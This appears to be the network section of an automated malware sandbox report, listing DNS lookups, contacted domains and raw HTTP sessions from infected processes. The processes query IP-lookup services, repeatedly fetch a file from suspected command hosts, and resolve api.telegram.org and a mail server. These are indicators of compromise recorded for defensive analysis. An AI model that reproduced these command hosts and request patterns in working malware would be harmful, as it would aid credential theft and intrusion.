                                                                                                                                                                                                                                                    Oct 29, 2024 13:07:59.559124947 CET1.1.1.1192.168.2.50x26a0No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:07:59.559124947 CET1.1.1.1192.168.2.50x26a0No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:01.168415070 CET1.1.1.1192.168.2.50x808fNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:01.168415070 CET1.1.1.1192.168.2.50x808fNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:02.361577988 CET1.1.1.1192.168.2.50xe39No error (0)vccmd02.googlecode.comgooglecode.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:02.361577988 CET1.1.1.1192.168.2.50xe39No error (0)googlecode.l.googleusercontent.com108.177.15.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:04.665932894 CET1.1.1.1192.168.2.50xf414No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:04.665932894 CET1.1.1.1192.168.2.50xf414No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:04.715051889 CET1.1.1.1192.168.2.50xded5No error (0)vccmd03.googlecode.comgooglecode.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:04.715051889 CET1.1.1.1192.168.2.50xded5No error (0)googlecode.l.googleusercontent.com142.251.168.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:07.174757004 CET1.1.1.1192.168.2.50xc74fName error (3)vccmd01.t35.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:08.771855116 CET1.1.1.1192.168.2.50xd131No error (0)vccmd01.zxq.net51.81.194.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:10.052191019 CET1.1.1.1192.168.2.50xee91No error (0)zxq.net51.81.194.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:17.727978945 CET1.1.1.1192.168.2.50xb3c9No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.699196100 CET1.1.1.1192.168.2.50xf43fName error (3)vccmd01.t35.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:26.350033998 CET1.1.1.1192.168.2.50xc898No error (0)mail.tlakovec.si212.44.112.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:33.356729031 CET1.1.1.1192.168.2.50x8edName error (3)241.42.69.40.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:35.738554955 CET1.1.1.1192.168.2.50x895bName error (3)vccmd01.t35.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:47.428945065 CET1.1.1.1192.168.2.50x3d52Name error (3)vccmd01.t35.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.835568905 CET1.1.1.1192.168.2.50x767eName error (3)vccmd01.t35.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:06.496651888 CET1.1.1.1192.168.2.50xf5e1Name error (3)vccmd01.t35.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:13.165195942 CET1.1.1.1192.168.2.50xf886Name error (3)vccmd01.t35.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:19.405249119 CET1.1.1.1192.168.2.50xdc00Name error (3)vccmd01.t35.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:25.509668112 CET1.1.1.1192.168.2.50xc499Name error (3)vccmd01.t35.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:31.136526108 CET1.1.1.1192.168.2.50x821dName error (3)vccmd01.t35.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:36.277333975 CET1.1.1.1192.168.2.50x12e0Name error (3)vccmd01.t35.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:41.643788099 CET1.1.1.1192.168.2.50x2faeName error (3)vccmd01.t35.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:47.525832891 CET1.1.1.1192.168.2.50x9a22Name error (3)vccmd01.t35.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:53.799762011 CET1.1.1.1192.168.2.50x1a38Name error (3)vccmd01.t35.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:59.197417021 CET1.1.1.1192.168.2.50x9c83Name error (3)vccmd01.t35.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:04.494157076 CET1.1.1.1192.168.2.50x4a43Name error (3)vccmd01.t35.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:11.403155088 CET1.1.1.1192.168.2.50x1e57Name error (3)vccmd01.t35.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:16.699156046 CET1.1.1.1192.168.2.50x7110Name error (3)vccmd01.t35.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:22.437026978 CET1.1.1.1192.168.2.50x7129Name error (3)vccmd01.t35.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:28.217782021 CET1.1.1.1192.168.2.50xb7bcName error (3)vccmd01.t35.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:33.534872055 CET1.1.1.1192.168.2.50x134dName error (3)vccmd01.t35.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:38.996296883 CET1.1.1.1192.168.2.50xb05dName error (3)vccmd01.t35.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:44.612570047 CET1.1.1.1192.168.2.50x1f0fName error (3)vccmd01.t35.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:50.250904083 CET1.1.1.1192.168.2.50xfecbName error (3)vccmd01.t35.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:10:55.695785046 CET1.1.1.1192.168.2.50x99f2Name error (3)vccmd01.t35.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:01.213273048 CET1.1.1.1192.168.2.50xac87Name error (3)vccmd01.t35.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:07.212618113 CET1.1.1.1192.168.2.50x95d1Name error (3)vccmd01.t35.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:12.731012106 CET1.1.1.1192.168.2.50x27f2Name error (3)vccmd01.t35.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:18.397253036 CET1.1.1.1192.168.2.50xb001Name error (3)vccmd01.t35.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:23.958632946 CET1.1.1.1192.168.2.50x1eeName error (3)vccmd01.t35.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:29.574548006 CET1.1.1.1192.168.2.50x7db7Name error (3)vccmd01.t35.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:35.134089947 CET1.1.1.1192.168.2.50x33e7Name error (3)vccmd01.t35.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:41.238910913 CET1.1.1.1192.168.2.50x6767Name error (3)vccmd01.t35.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:47.149904966 CET1.1.1.1192.168.2.50xc902Name error (3)vccmd01.t35.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:52.595525026 CET1.1.1.1192.168.2.50x123cName error (3)vccmd01.t35.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 29, 2024 13:11:58.126013041 CET1.1.1.1192.168.2.50x34cdName error (3)vccmd01.t35.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    • reallyfreegeoip.org
                                                                                                                                                                                                                                                    • zxq.net
                                                                                                                                                                                                                                                    • slscr.update.microsoft.com
                                                                                                                                                                                                                                                    • otelrules.azureedge.net
                                                                                                                                                                                                                                                    • api.telegram.org
                                                                                                                                                                                                                                                    • fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                                                    • vccmd01.googlecode.com
                                                                                                                                                                                                                                                    • checkip.dyndns.org
                                                                                                                                                                                                                                                    • vccmd02.googlecode.com
                                                                                                                                                                                                                                                    • vccmd03.googlecode.com
                                                                                                                                                                                                                                                    • vccmd01.zxq.net
                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    0192.168.2.54970464.233.166.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:07:59.188297987 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:00.100457907 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:07:59 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:00.100480080 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    1192.168.2.549705132.226.247.73805568C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:07:59.576453924 CET151OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:00.451689005 CET323INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:00 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                    Content-Length: 106
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                    X-Request-ID: 1f2dfa7f80f1aa63a336904bfb771d39
                                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:00.504200935 CET127OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:00.769324064 CET323INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:00 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                    Content-Length: 106
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                    X-Request-ID: 678a4be87e5c449422fddd5d9f8a1107
                                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:02.499444008 CET127OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:02.763768911 CET323INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:02 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                    Content-Length: 106
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                    X-Request-ID: 540cbaa2a862cbe14f93ba80d40f38a6
                                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    2192.168.2.549707108.177.15.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:02.368700027 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd02.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:03.290827036 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:03 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:03.290849924 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    3192.168.2.549709132.226.247.73805568C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:03.784301043 CET127OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:04.656728983 CET323INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:04 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                    Content-Length: 106
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                    X-Request-ID: ae96a13219d6676ed0dd925475ed54bc
                                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    4192.168.2.549711142.251.168.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:04.721707106 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd03.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:05.653434992 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:05 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
